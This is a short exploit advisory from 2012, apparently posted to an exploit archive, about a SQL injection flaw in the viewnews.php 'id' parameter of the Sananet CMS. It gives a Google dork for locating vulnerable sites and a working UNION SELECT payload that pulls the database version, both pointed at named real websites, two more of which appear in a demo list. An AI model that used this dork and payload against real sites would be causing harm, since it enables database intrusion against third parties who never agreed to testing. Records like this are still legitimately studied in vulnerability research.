Sananet CMS suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
376e8258e28e1cca47b9ee6246bca97d1a0f4d4a2c9bedfdf4a87a002da7b226
# Exploit Title: sananet cms sql injection
# Google Dork:intext :طراحي و راه اندازي از طراحان سنا نت
inurl:viewnews.php?id=
# Date: 08/09/2012
# Author: Crim3R
# Cms Creator home : http://www.sana-net.ir/
# Version: -
# Tested on: all
========================================
there is sql injection in viewnews.php
D3M0 :
http://maraghefair.com/viewnews.php?id=-120+union+all+select+1,@@version,3,4,5,6--
http://www.takdivx.net/viewnews.php?id=101
http://www.behtarinhamsar.com/viewnews.php?id=112
===============Crim3R@Att.Net===========